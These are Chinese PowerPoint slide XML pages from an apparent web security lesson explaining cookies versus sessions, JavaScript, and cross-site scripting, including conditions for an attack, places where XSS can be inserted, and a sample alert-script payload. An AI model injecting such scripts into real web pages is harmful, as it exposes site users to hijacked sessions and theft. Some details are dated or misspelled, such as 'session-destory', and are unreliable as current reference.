              <a:t>Cookie通过在客户端记录信息确定用户身份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，Session通过在服务器端记录信息确定用户身份。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>2、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不是很安全，别人可以分析存放在本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>并进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，考虑到安全应当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>3、设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>时间可以使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>过期。但是使用session-destory（），将会销毁会话。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>4、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>会在一定时间内保存在服务器上。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当访问增多，会比较占用你服务器的性能考虑到减轻服务器性能方面，应当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>5、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>单个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>保存的数据不能超过4K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>很多浏览器都限制一个站点最多保存20个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>(Session对象没有对存储的数据量的限制，其中可以保存更为复杂的数据类型)</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90334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cookie和session的区别</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10820822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0553C9-4AC1-1D06-4026-452492B0B8BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1215" t="609" r="-1215" b="7482"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7736311" cy="5676406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6F8206-F14C-D368-DF8D-D9F1F927414C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965534" y="3695206"/>
            <a:ext cx="688768" cy="288965"/>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53C06556-D8D0-D9EA-D0BF-A43445C6361F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523971" y="3695206"/>
            <a:ext cx="498764" cy="288965"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D778FC-D47D-7DBA-2637-C076A3B8A476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965534" y="-565233"/>
            <a:ext cx="7137400" cy="3327400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34FB155-10F4-712C-E11C-795AD6F499AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6137101" y="3162794"/>
            <a:ext cx="5867400" cy="3263900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1866454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85152" y="169086"/>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630930" cy="501650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>从 xss 反打到进小黑屋</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2921635" y="962025"/>
            <a:ext cx="6348730" cy="49339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628390"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JavaScript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JS</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）脚本</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1167130"/>
            <a:ext cx="9883140" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>JavaScript是一种属于网络的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚本语言,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>已经被广泛用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>开发,常用来为网页添加各式各样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>动态功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>,为用户提供更流畅美观的浏览效果。通常JavaScript脚本是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嵌入在HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>中来实现自身的功能的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解释性脚本语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（代码不进行预编译）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>主要用来向HTML（标准通用标记语言下的一个应用）页面添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>交互行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的攻击需要以下条件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存在跨站脚本漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的web应用程序；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向web页面注入恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这些恶意代码能够</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被浏览器成功的执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要用户点击连接或者是访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>某一页面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>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62763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XSS （cross site script）跨站脚本攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="781685"/>
            <a:ext cx="9920605" cy="1695336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>）攻击，从本质上来说就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意攻击者利用网站没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户提交数据进行转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>处理或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过滤不足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="2477021"/>
            <a:ext cx="9648825" cy="3372077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS可以插在哪里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>？ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>用户输入作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>用户输入作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>内容：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;div&gt;我的书</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(在他这里!)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>用户输入作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的属性名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>用户输入作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的属性值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>用户输入作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML标签</a:t>
            </a:r>
